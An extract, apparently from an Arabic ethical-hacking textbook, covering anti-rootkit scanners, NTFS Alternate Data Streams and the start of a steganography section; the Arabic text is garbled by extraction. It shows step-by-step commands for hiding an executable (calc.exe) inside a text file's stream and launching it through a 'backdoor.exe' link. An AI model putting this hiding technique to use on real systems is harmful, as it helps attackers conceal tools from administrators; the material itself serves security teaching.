https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
447
إﻋﺎدة ﺗﺷﻐﯾل ﺟﮭﺎزك إﻟﻰ ﻧظﺎم ﺗﺷﻐﯾل اﻟﺑدﯾل أو ﺗرﻛﯾب ﻣﺣرك اﻷﻗراص إﻟﻰ ﺟﮭﺎز آﺧر ،ﯾﻣﻛﻧك ﻓﺣص ﻣﺣرك اﻷﻗراص أﻛﺛر ﺷﻣوﻻ .ﻷن
ﻧظﺎم اﻟﺗﺷﻐﯾل اﻷﺻﻠﻲ ﻟن ﯾﻛون ﻗﯾد اﻟﺗﺷﻐﯾل وأﯾﺿﺎ ﻋﻣﻠﯾﺔ اﻟﻔﺣص ﻟن ﯾﺗطﻠب اﺳﺗدﻋﺎء APIﻣن اﻟﻧظﺎم اﻟﻣﺻﺎب ،ﻓﻣن اﻷرﺟﺢ أﻧك ﺳوف
ﺗﻛون ﻗﺎدرة ﻋﻠﻰ اﻛﺗﺷﺎف وإزاﻟﺔ اﻟروت ﻛت .ﺣﺗﻰ ﻣﻊ ﻛل ھذا ،ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن ﻓﺎن أﻓﺿل ﺷﻲء ﺣﺗﻰ ﻣﻊ ﻓﺣص اﻟﻧظﺎم ھو ﺑﺑﺳﺎطﺔ،
اﻟﻔرﻣﺗﺔ ﺑﺷﻛل ﻛﺎﻣل ،واﻟﺑدء ﻣن ﺟدﯾد.
Anti-Rootkit: Stinger
اﻟﻣﺻدرhttp://www.mcafee.com/us :
McAfee Stingerﯾﺳﺎﻋدك ﻋﻠﻰ اﻛﺗﺷﺎف وإزاﻟﺔ اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ذات اﻻﻧﺗﺷﺎر ،واﻟﻔﯾروﺳﺎت ،واﻟﺗﮭدﯾدات اﻟﻣﺣددة ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص
ﺑك Stinger .ﯾﻘوم ﺑﻔﺣص اﻟروت ﻛت ،واﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ ،وﺣدات ﺗﺣﻣﯾل ،اﻟﺗﺳﺟﯾل ،ودﻟﯾل اﻟﻣواﻗﻊ اﻟﻣﻌروﻓﺔ ﻻﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﺑراﻣﺞ
اﻟﺿﺎرة ﻋﻠﻰ اﻟﺟﮭﺎز ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟﺣد اﻷدﻧﻰ ﻣن ﻣرات اﻟﻔﺣص .ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﺻﻼح اﻟﻣﻠﻔﺎت اﻟﻣﺻﺎﺑﺔ اﻟﺗﻲ وﺟدت ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص
ﺑك .ﯾﻛﺷف وﯾﻌطل ﻛل اﻟﻔﯾروﺳﺎت ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك.
Anti-Rootkit: UnHackMe
اﻟﻣﺻدرhttp://www.greatis.com :
UnHackMeھو ﻓﻲ اﻷﺳﺎس ﺑرﻧﺎﻣﺞ ﻟﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت واﻟذى ﯾﺳﺎﻋدك ﻓﻲ ﺗﺣدﯾد وإزاﻟﺔ ﺟﻣﯾﻊ أﻧواع اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل اﻟروت ﻛت ،
واﻟﺗرواﺟن ،و ،wormsواﻟﻔﯾروﺳﺎت ،وھﻠم ﺟرا .اﻟﻐرض اﻟرﺋﯾﺳﻲ ﻣن UnHackMeھو ﻣﻧﻊ اﻟروت ﻛت ﻣن إﯾذاء ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر
اﻟﺧﺎص ﺑك ،ﻣﻣﺎ ﯾﺳﺎﻋد اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺣﻣﺎﯾﺔ أﻧﻔﺳﮭم ﺿد اﻟﺗﺳﻠل وﺳرﻗﺔ اﻟﺑﯾﺎﻧﺎت .ﯾﺗﺿﻣن UnHackMeأﯾﺿﺎ ﻣﯾزة ،Reanimator
واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ ﻹﺟراء ﻓﺣص ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻛﺎﻣﻼ.
اﻟﻣﻣﯾزات:
-دﻗﺔ اﻟﻔﺣص اﻟﻣزدوج ﻟﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﯾﺳﺗﻧد إﻟﻰ .Windows
-ﺗﺗﺑﻊ اﻟﺷﯾﻔرات اﻟﺧﺑﯾﺛﺔ ﻓﻲ اﻟﻧظﺎم )اﻟروت ﻛت ،واﻟﺗرواﺟن ،و ،wormsواﻟﻔﯾروﺳﺎت ،وھﻠم ﺟرا(
-ﻻ ﯾﺑطﺊ اﻟﻛﻣﺑﯾوﺗر وأﻧﮫ ﻣﺗواﻓﻖ ﻣﻊ ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت.
ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ﺳﻣﺎت اﻟﻣﻠف) ، (File attributeﻛل ﻣﻠف ﻣﺧزﻧﺔ ﻋﻠﻰ وﺣدة ﺗﺧزﯾن NTFSﯾﺣﺗوي ﻋﺎدة ﻋﻠﻰ اﺛﻧﯾن ﻣن ﺗدﻓﻘﺎت اﻟﺑﯾﺎﻧﺎت
اﻷﺳﺎﺳﯾﺔ ) .(Data Streamدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻷوﻟﻰ ﯾﻘوم ﺑﺗﺧزﯾن واﺻﻔﺎت اﻷﻣﺎن) ، (security descriptorودﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺛﺎﻧﻲ ﯾﻘوم
ﺑﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت داﺧل اﻟﻣﻠﻔﺎت .دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )] (Alternate Data Stream [ADSھﻲ ﻧوع آﺧر ﻣن دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻣذﻛورة
واﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﻣوﺟودة ﻓﻲ ﻛل ﻣﻠف.
ﯾدﻋم ﻧظﺎم اﻟﻣﻠﻔﺎت NTFSﻣﺎ ﯾﺳﻣﻰ ﺑـ Alternate Data Streamأو .ADS
إﻧﺷﺎء اﻟـ ADSﺟﺎء ﻟﯾﺣل ﻣﺷﻛﻠﺔ ﺣﺎﺟﺔ ﺑﻌض اﻟﺑراﻣﺞ إﻟﻰ رﺑط ﻣﻌﻠوﻣﺎت ﻣﻊ ﻣﻠف ﻣﻌﯾن ﺑﺣﯾث ﯾﺗم ھذا اﻟرﺑط ﺑﺷﻛل Transparentﺑﺎﻟﻧﺳﺑﺔ
ﻟﻣﺳﺗﺧدﻣﻲ اﻟﻣﻠف )ﺑراﻣﺞ أو ﻣﺳﺗﺧدﻣﯾن (.وأﯾﺿﺎ ﻻ ﯾﻐﯾّر ھذا اﻟرﺑط ﻣن ﺣﺟم اﻟﻣﻠف.
ﯾﺗم اﺳﺗﺧداﻣﮭﺎ أﯾﺿﺎ ﻟﺗواﻓﻖ اﻟوﯾﻧدوز ﻣﻊ ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﻘدﯾم HFSاﻟﺧﺎص ﺑﻣﺎﻛﻧﺗوش ﺣﯾث ﯾﺗم اﺳﺗﺧدام ﻣﻔﮭوم ﻣﻣﺎﺛل ﻓﻲ اﻟﻣﺎﻛﻧﺗوش ﺣﯾث
ﯾﺳﻣﻰ ھﻧﺎ Resource Forksوﺗﺳﺗﺧدم ﻓﻲ ﻣﺎﻛﻧﺗوش ﻟﺗﺧزﯾن أﯾﻘوﻧﺔ اﻟﻣﻠف ﻣﺛﻼ وﺷﻛل اﻟﻧﺎﻓذة ،وأﯾﺿﺎ ﻟرﺑط اﻟﻣﻠف ﻣﻊ ﺑرﻧﺎﻣﺞ ﻣﻌﯾن )ﻓﻲ
وﯾﻧدوز ﯾﺗم ھذا اﻟرﺑط ﻣن ﺧﻼل ﻻﺣﻘﺔ اﻟﻣﻠف(.
ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان أي اﻟﻣﻠف ﻓﻲ ﻧظﺎم NTFSﻣؤﻟف ﻣن اﺛﻧﯾن ﻣن Streamاﻷﺳﺎﺳﯾﯾن وﻟﻛن ﯾوﺟد ﺗدﻓﻘﺎت أﺧرى ) .(streamوﻟﻛل
Streamﻣﺟﻣوﻋﺔ ﻣن اﻟﺧﺻﺎﺋص ﻟﺗوﺻﯾف ھذه اﻟـ .Streamﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ:
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
449
ﻟﻠـ Streamﯾوﺟد اﺳم ﻣﻣﯾز ﻟﮫ .واﻟـ Streamاﻻﻓﺗراﺿﯾﺔ ﺗﻛون ﺑدون اﺳم ) nullﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺳﺎﺑﻘﺔ(.
ﻻﺳﺗﺧدام Streamأﺧرى ﯾﺗم إﻟﺣﺎق اﺳم اﻟـ Streamﺑﻌد اﺳم اﻟﻣﻠف وﺑﻌد ﻧﻘطﺗﯾن”. “:
ﻣﺛﺎل:
D:\test.txt => Default Stream here
D:\test.txt:OPS => Stream called OPS
ﻣﺳﺗﻌرض اﻟوﯾﻧدوز Explorerﻻ ﯾﻌرض اﻟـ Streamsﻟﻣﻠف ﻣﺎ ،وﺑﺎﻟﺗﺎﻟﻲ ﯾﻣﻛن اﺧﻔﺎء ﻣﻌﻠوﻣﺔ ﻣﺎ ﺿﻣن ﻣﻠف ﻣﺎ ﺑﺣﯾث ﻻ ﯾﻣﻛن أن ﯾظﮭره
ﻣﺳﺗﻌرض وﯾﻧدوز.
ﻣﺛﺎل:
D:\> echo mypasword > passwords.txt:email
طﺑﻌﺎ إذا ﺗم ﻓﺗﺢ اﻟﻣﻠف passwords.txtﺑﺷﻛل ﻋﺎدي ﻓﺳوف ﯾﺗم اﺳﺗﺧدام اﻟـ Streamاﻻﻓﺗراﺿﯾﺔ وﻟن ﯾﺗم إظﮭﺎر ﻣﺎ ﺗم إﺧﻔﺎءه ﺿﻣن اﻟـ
streamاﻟﺗﻲ أﻧﺷﺄﻧﺎھﺎ ھﻧﺎ. email
ﻹظﮭﺎر اﻟﻣﺣﺗوى )ﻣﺛﻼ(:
D:\> more < passwords.txt:email
mypasword
دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )] (Alternate Data Stream [ADSھو أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﻣﻛن ﺗرﻛﯾﺑﮭﺎ ﻋﻠﻰ اﻟﻣﻠف وﻟﻛن ﻟﯾﺳت ﻓﻲ/داﺧل
اﻟﻣﻠف ﻋﻠﻰ ﻧظﺎم .NTFSﺟدول اﻟﻣﻠﻔﺎت اﻟرﺋﯾﺳﯾﺔ ) (Master File Tableاﻟﺧﺎص ﺑﻛل ﺑﺎرﺗﺷن ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ
ﯾﺣﺗوﯾﮭﺎ اﻟﻣﻠف ،وﻣوﻗﻌﮭﺎ اﻟﻔﻌﻠﻲ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب .ﻟذﻟك ،دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ ) (ADSﻟﯾﺳت ﻣوﺟودة ﻓﻲ اﻟﻣﻠف ،وﻟﻛن ﻣﺗﺻﻠﺔ ﺑﮫ وذﻟك
ﻣن ﺧﻼل ﺟدول اﻟﻣﻠف .دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )] (Alternate Data Stream [ADSھو ﺟزء ﻣﺧﻔﻰ ﻓﻲ اﻟوﯾﻧدوز واﻟذي ﯾﺣﺗوي ﻋﻠﻰ
اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ ﻟﻠﻣﻠف ﻣﺛل اﻟﺻﻔﺎت) ،(Attributeﻋدد اﻟﻛﻠﻣﺎت ،اﺳم اﻟﻣؤﻟف ،وﺑﯾﺎﻧﺎت اﻟوﺻول ووﻗت اﻟﺗﻌدﯾل ﻣن اﻟﻣﻠﻔﺎت.
ﯾﻣﻛن ﻣﺛﻼ اﻻﺳﺗﻔﺎدة ﻣن ADSﻟﺗﺗﺑﻊ ﺣﺎﻟﺔ اﻟﻣﻠف ﻣﺛﻼ ﺣﺟﻣﮫ )ﻛﻣﺎ ﻓﻲ ﺑﻌض طرق اﻟﺣﻣﺎﯾﺔ ،ﺣﯾث إذا ﺗﻐﯾّر ﺣﺟم ﻣﻠف ﺗﻧﻔﯾذي ﯾﻣﻛن اﻋﺗﺑﺎره ﻗد
أﺻﯾب ﺑﻔﯾروس( وﺑﺎﻟﺗﺎﻟﻲ ﺑدﻻ ﻣن إﻧﺷﺎء ﻗﺎﻋدة ﻣﻌﯾطﺎت ﺿﺧﻣﺔ ﻟﻛل ﻣﻠف ﻣوﺟود ﻋﻠﻰ اﻟﺟﮭﺎز ﯾﻣﻛن وﺿﻊ ھذه اﻟﻣﻌﻠوﻣﺎت ﻋﻧد ﻛل ﻣﻠف.
ADSﻟﮫ اﻟﻣﻘدرة ﻋﻠﻰ ﺗﻔرﯾﻖ اﻟﺑﯾﺎﻧﺎت إﻟﻰ اﻟﻣﻠﻔﺎت اﻟﻣوﺟودة دون ﺗﻐﯾﯾر أو ﺗﻐﯾﯾر وظﺎﺋﻔﮭﺎ ،وﺣﺟﻣﮭﺎ ،أو ﻋرﺿﮭﺎ ﻷداة ﻣﺗﺻﻔﺢ اﻟﻣﻠﻔﺎت.
ADSsﯾﻘدم ﻟﻠﻣﮭﺎﺟﻣﯾن طرﯾﻘﺔ ﯾﺧﺑﺊ ﺑﮭﺎ rootkitsأو أدوات اﻟﻘراﺻﻧﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺧﺗرق واﻟﺳﻣﺎح ﻟﮭم ﻟﯾﺗم ﺗﻧﻔﯾذھﺎ دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ
ﻣن ﻗﺑل ﻣﺳؤول اﻟﻧظﺎم .اﻟﻣﻠﻔﺎت ﻣﻊ ADSﻣن اﻟﻣﺳﺗﺣﯾل أن ﯾﺗم اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ﺗﺻﻔﺢ اﻟﻣﻠف اﻷﺻﻠﻲ ﻣﺛل ﺳطر اﻷواﻣر
) (Command Lineأو ﻣﺗﺻﻔﺢ ﻣﻠﻔﺎت اﻟوﯾﻧدوز ) .(Windows Explorerﺑﻌد إرﻓﺎق/رﺑط ﻣﻠف ADSإﻟﻰ اﻟﻣﻠف اﻷﺻﻠﻲ ،ﻓﺎن ﺣﺟم
اﻟﻣﻠف ﺳوف ﯾظﮭر اﻟﺣﺟم اﻷﺻﻠﻲ ﻟﻠﻣﻠف ﻓﻘط ﺑﻐض اﻟﻧظر ﻋن ﺣﺟم .ADS anyfile.exeاﻟﻣؤﺷر اﻟوﺣﯾد اﻟذي ﺗﻌﺑر اﻧﮫ ﺗم ﺗﻐﯾﯾر اﻟﻣﻠف ھو
ﺗﻌدﯾل اﻟطﺎﺑﻊ اﻟزﻣﻧﻲ) ،(TimeStampاﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﻏﯾر ﺿﺎرة ﻧﺳﺑﯾﺎ.
ﻧﻔرض اﻧﻧﺎ ﻧرﯾد إﺧﻔﺎء ﻣﻠف ﻣﺎ ﺑواﺳطﺔ NTFS Streamوﻟﯾﻛن ﻣﺛﻼ calc.exeﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ:
-1ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﯾﺳﻣﻰ magicﻓﻲ اﻟﺑﺎرﺗﺷن \ C:ﺛم ﻧﻘوم ﺑﻧﺳﺦ اﻟﻣﻠف calc.exeاﻟﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر C:\windows\system32
اﻟﻰ اﻟﻣﺟﻠد .C:\magic
-2ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر Command Promptوﻣن ﺧﻼﻟﮫ ﻧﻘوم ﺑﺎﻟذھﺎب اﻟﻰ اﻟﻣﺟﻠد ،C:\magicﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑطﺑﺎﻋﺔ
اﻟﺳطر notepad readme.txtﻓﻲ ﺳطر اﻷواﻣر ﺛم اﻟﻧﻘر ﻓوق .Enter
-3ھذا ﯾؤدى اﻟﻰ ظﮭور ﺑرﻧﺎﻣﺞ اﻟﻛﺗﺎﺑﺔ notepadﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻟﺳطر Hello worldﻓﯾﮫ ﺛم ﻏﻠﻖ وﺣﻔظ اﻟﻣﻠف.
-4ﻧﻘوم ﺑﻣﻼﺣظﮫ ﺣﺟم اﻟﻣﻠف readme.txtﻣن ﺧﻼل طﺑﺎﻋﺔ اﻟﺳطر dirﻓﻲ ﺳطر اﻷواﻣر .Command Prompt
-5ﻧذھب اﻻن اﻟﻰ إﺧﻔﺎء اﻟﻣﻠف calc.exeﻓﻲ اﻟﻣﻠف readme.txtوذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ ﻓﻲ ﺳطر اﻷواﻣر .cmd
C:\type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
-6ﺑﻌد اﺳﺗﺧدام ھذا اﻟﺳطر وﻣﻼﺣظﮫ اﻟﻣﺳﺎﺣﺔ اﻟﺟدﯾدة ﻟﻠﻣﻠف readme.txtﻧﺟد اﻧﮭﺎ ﻟم ﺗﺗﻐﯾر.
-7اﻻن ﯾﻣﻛﻧك ﺣذف اﻟﻣﻠف calc.exeﻷﻧﻧﺎ ﻟم ﻧﻌد ﻓﻲ ﺣﺎﺟﮫ اﻟﯾﮫ ﺣﯾث ﻗﻣﻧﺎ ﻣن ﺧﻼل اﻟﺳطر اﻟﺳﺎﺑﻖ ﺑﺈﺧﻔﺎﺋﮫ ﻓﻲ اﻟﻣﻠف .readme.txt
-8اﻻن ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ وذﻟك ﻟﻌﻣل رﺑط ﻟﻠﻣﻠف calc.exeاﻟﻣﺧﺑﺄ ﻓﻲ اﻟﻣﻠف .readme.txt
C:\ mklink backdoor.exe readme.txt:calc.exe
-9ﺛم اﻟﻧﻘر ﻓوق .Enter
-10ﻋﻧد طﺑﺎﻋﺔ backdoorﻓﻲ ﺳطر اﻷواﻣر ﻓﮭذا ﺳوف ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل اﻻﻟﮫ اﻟﺣﺎﺳﺑﺔ.
STEGANOGRAPHY
ﻛﺛﯾرة ھﻲ اﻟطرق أو اﻟوﺳﺎﺋل اﻟﺗﻲ ﯾﺳﺗﻐﻠﮭﺎ ﺑﻌض ﻣن ﺗﺳول ﻟﮫ ﻧﻔﺳﮫ اﻟﻌﺑث ﺑﻣﻣﺗﻠﻛﺎت اﻟﻐﯾر ،ﺳواء ﻛﺎﻧت أﺷﯾﺎء ﻣﻠﻣوﺳﺔ أو ﻣﻌﻠوﻣﺎت ﻣﺧزﻧﺔ ﻓﻲ
اﻷﺟﮭزة اﻟﺣﺎﺳوﺑﯾﺔ .وﻓﻲ اﻟﻌﺻر اﻟﺣدﯾث أو ﻣﺎ ﯾﺳﻣﻰ ﺑﻌﺻر اﻟﻣﻌﻠوﻣﺎﺗﯾﺔ ،ﺗﻧﺎﻣت ﻗﯾﻣﺔ اﻟﻣﻌﻠوﻣﺎت ﻟدرﺟﺔ ﺗﻔوق ﺑﻣراﺣل اﻟﻣﻣﺗﻠﻛﺎت اﻟﺣﺳﯾﺔ،
وھذا ﻣﺎ أﺛرى اﻟﺑﺣث ﻓﻲ ﻣﺟﺎل اﻟوﺳﺎﺋل اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋﻣن ﻻ ﯾﻣﺗﻠﻛﮭﺎ ووﺿﻌﮭﺎ ﻓﻲ ﻣﺄﻣن ،وﻛذﻟك اﻟوﺳﺎﺋل اﻟﺗﻲ
ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ ﻛﺷف أي ﻣﻌﻠوﻣﺎت ﻣﺧﺑﺄة ﺑطرﯾﻘﺔ ﻏﯾر ﺷرﻋﯾﺔ .وﻋﻧد اﻟﺣدﯾث ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ،ﻓﺈن أول ﻣﺎ ﯾﺗﺑﺎدر إﻟﻰ اﻟذھن ھو ﻋﻣﻠﯾﺔ
ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺎت) (Cryptographyأو ﺗﺣوﯾﻠﮭﺎ إﻟﻰ ﺻﯾﻐﺔ أﺧرى ﻏﯾر ﻣﻔﮭوﻣﺔ إﻻ ﺑﺎﺳﺗﺧدام ﻣﻔﺗﺎح اﻟﺷﻔرة أو ال) .(keyﻟﻛن ھذا ﻻ ﯾﻌﻧﻲ
أن اﻟﺗﺷﻔﯾر ھو اﻟطرﯾﻘﺔ اﻟوﺣﯾدة اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﻐﯾر .ﻓﻲ اﻟواﻗﻊ ،ھﻧﺎك ﻓن آﺧر ﯾﻘﺿﻰ ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻛﻠﯾﺎ
ﻟﻠﺗواﺻل ﻣﺎ ﺑﯾن ﺟﮭﺗﯾن ﻟﺗﺻﺑﺢ ھذه اﻟﺑﯾﺎﻧﺎت أو ھذا اﻻﺗﺻﺎل ﻏﯾر ظﺎھر ﻣن اﻷﺳﺎس ﻟﺟﮭﺔ ﺛﺎﻟﺛﺔ وھذا ﻣﺎ ﯾﻌرف ب.Steganography
واﻟﺗﻲ ﻛﺛﯾرا ﻣﺎ ﺗﺳﺗﺧدم ﻣن ﻗﺑل ﻟﺻوص اﻟﻣﻌﻠوﻣﺎت ﻟﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ .إذن ،ﻓﻣﺎ ھﻲ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ،وﻛﯾف ﺗﺳﺗﺧدم ،وھل ﯾﻣﻛن
اﻛﺗﺷﺎﻓﮭﺎ واﻟﺗﺣﻔظ ﻣﻧﮭﺎ؟ ﺳﺄﺣﺎول إﺟﺎﺑﺔ ھذه اﻷﺳﺋﻠﺔ ﺑطرﯾﻘﺔ ﻣﺑﺳطﺔ ﻓﻲ اﻟﺳطور اﻟﺗﺎﻟﯾﺔ.
ﻛﻠﻣﺔ Steganographyأو إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ھﻲ اﻟطرﯾﻘﺔ أو اﻟﺗﻘﻧﯾﺔ ﻟﺣﺟب وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت داﺧل وﺳﯾط رﻗﻣﻲ ﺑﻐرض ﻧﻘﻠﮭﺎ ﻋﺑر ھذا
اﻟوﺳﯾط إﻟﻰ ﻣﻛﺎن آﺧر ﺣﯾث ﯾﺳﺗﻌﻣل ھذا اﻟوﺳط ،وذﻟك ﺣﺗﻰ ﯾﺗم إﺧﻔﺎء أن ھﻧﺎك اﺗﺻﺎل أو ﺗﺑﺎدل ﻣﻌﻠوﻣﺎت .ﯾﺗم ﻓﻲ اﻟﺧﻔﺎء ،وﻻ ﯾﻛون ﻋﻠﻰ ﻋﻠم
ﺑﮭذا اﻻﺗﺻﺎل إﻻ اﻷﺷﺧﺎص اﻟﻣﻌﻧﯾﯾن.
ﻓﻌﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﻗد ﯾﺳﺗﺧدم ﺷﺧص ﻣﺎ ﺻورة إﻟﻛﺗروﻧﯾﺔ ﻟﻧﻘل رﺳﺎﺋل ﻧﺻﯾﺔ )أو ﺣﺗﻰ ﺻور ﻣﺧﻔﯾﺔ( إﻟﻰ ﺷﺧص آﺧر دون أن ﯾﻌﻠم أﺣد .ﻓﻛل
ﻣن ﯾﻧظر ﻣن اﻟﺧﺎرج ﯾظن أن اﻟﺷﺧﺻﯾن ﯾﺗﺑﺎدﻻن ﺻورا ،ﺑﯾﻧﻣﺎ ھذه اﻟﺻور ﻣﺣﻣﻠﺔ ﺑرﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻏﯾر واﺿﺣﺔ ﻟﻠﻌﯾﺎن.
ﻛﻠﻣﺔ Steganographyأﺳﺎﺳﺎ ﻣﺷﺗﻘﺔ ﻣن ﻛﻠﻣﺔ ﯾوﻧﺎﻧﯾﺔ وﺗﻌﻧﻲ “اﻟﻛﺗﺎﺑﺔ اﻟﻣﺧﻔﯾﺔ” ﻣن اﻟﻛﻠﻣﺔ ) ,"steganos",( στεγανόςﺳﺗﯾﻐﺎﻧوس،
وﺗﻌﻧﻲ اﻟﻣﺣﻣﻲ أو اﻟﻣﻐطﻰ ،واﻟﻛﻠﻣﺔ ) ،”graphei",( γραφήﻏراﻓﻲ ،وﺗﻌﻧﻲ اﻟﻛﺗﺎﺑﺔ .ﻣوﺿوع إرﺳﺎل اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ﻋن طرﯾﻖ ﺣﺟب أن
ھﻧﺎك ﺷﻲء ﻣرﺳل ﻣن اﻷﺳﺎس .ھﻲ طرﯾﻘﺔ وﻓﻛرة ﻗدﯾﻣﺔ وﻟﮭﺎ ﻗﺻﺔ ﺗﺎرﯾﺧﯾﺔ ﻓﻘدﻣﺎء اﻹﻏرﯾﻖ اﻋﺗﺎدوا ﻣﺛﻼً ﺣﻔر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ طﺎوﻻت
ﻣن اﻟﺧﺷب ،ﺛم ﯾﻐطوﻧﮭﺎ ﺑطﺑﻘﮫ ﻣن اﻟﺷﻣﻊ .وﺣﯾن ﺗﺻل اﻟرﺳﺎﻟﺔ ﻋﻠﻰ اﻟﺷﺧص اﻟﻣﻘﺻود ،ﯾﻘوم ﺑﺈزاﻟﺔ أو إذاﺑﺔ اﻟﺷﻣﻊ ﻟﯾﺣﺻل ﻋﻠﻰ رﺳﺎﻟﺗﮫ.
ﻛذﻟك اﺳﺗﺧدم اﻹﻏرﯾﻖ وﺳﯾﻠﺔ أﺧرى ﻟﻧﻔس اﻟﻐرض ،وإن ﻛﺎﻧت وﺣﺷﯾﺔ ﺑﻌض اﻟﺷﻲء ،ﺑﻣﻘﺎﯾﯾس ﻋﺻرﻧﺎ ﺑﺎﻟطﺑﻊ .ﺣﯾث ﻛﺎﻧوا ﯾﻘوﻣون ﺑﺣﻠﻖ
رؤوس اﻟﻌﺑﯾد ،ﺛم ﯾﺗم )وﺷم( اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻋﻠﻰ ھذه اﻟرؤوس اﻟﺑﺎﺋﺳﺔ .ﺑﻌدھﺎ ﯾﺣﺑﺳون اﻟﺷﺧص ﺣﺗﻰ ﯾطول ﺷﻌره ،ﻓﯾﻐطﻲ ﻓروة رأﺳﮫ
)واﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣﻌﮭﺎ( ،وﯾرﺳﻠوﻧﮫ إﻟﻰ اﻟطرف اﻵﺧر .وﺣﯾن ﯾﺻل إﻟﻰ ھﻧﺎك ،ﯾﻘوم ھذا اﻷﺧﯾر ﺑﺣﻠﻖ رأس اﻟﻌﺑد ،وﯾﻘرأ اﻟرﺳﺎﻟﺔ .وﻓﻲ
اﻟﻌﺻر اﻟﺣدﯾث ﻛﺎن اﻟﺣﺑر اﻟﺳري أﺣد أھم أدوات اﻟﻌﻣﻼء واﻟﻣﺧﺑرﯾن ﺧﻼل اﻟﺣرب اﻟﻌﺎﻟﻣﯾﺔ اﻟﺛﺎﻧﯾﺔ.
وﻓﻲ اﻟﻌﺎﻟم اﻟرﻗﻣﻲ ،ﯾﺗم إﺧﻔﺎء أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت واﻟﻣﻠﻔﺎت ،داﺧل أﻧواع ﻋدﯾدة وﻣﺧﺗﻠﻔﺔ ﻣن اﻟﻣﻠﻔﺎت .ﻛﻣﺎ أن أﺣد اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ظﮭرت
